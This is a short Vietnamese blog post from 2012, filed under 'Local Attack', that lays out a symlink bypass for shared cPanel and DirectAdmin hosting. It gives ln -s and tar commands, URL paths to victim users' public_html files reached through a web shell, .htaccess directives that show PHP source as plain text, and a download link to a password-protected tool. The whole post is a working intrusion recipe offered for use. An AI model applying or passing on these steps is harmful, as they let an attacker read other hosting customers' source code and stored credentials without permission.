Chủ Nhật, 17 tháng 6, 2012
Symljnk Bypass view file.php
Cpanel (:2082)
ln -s / dmx.txtdirect admin(:2222)
tar -zcvf cpanel_dmx.tar.gz
ln -s / r00tcó quyền login host và giải nén thư mục ra
tar -zcvf direct_r00t.tar.gz r00t
chạy trên address
cpanel :http://shell_on_this_host_/dmx.txt/home/user_victim/public_html/index.php
direct :r00t/home/user_victim/domains/public_html/index.php
.htaccess
Options Indexes FollowSymLinkscon .htaccess này có chức năng show ra các file.php dưới dạng file text
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
nên cho dù permisson thư mục nhưng đên file này vẫn có thể view
hoặc show ra cả file.html
Options allDownload: http://www.mediafire.com/?68yyho1ys1pj9sh
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Pass Unlock & Unrar: junookyo
Chuyên Mục:
Local Attack
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: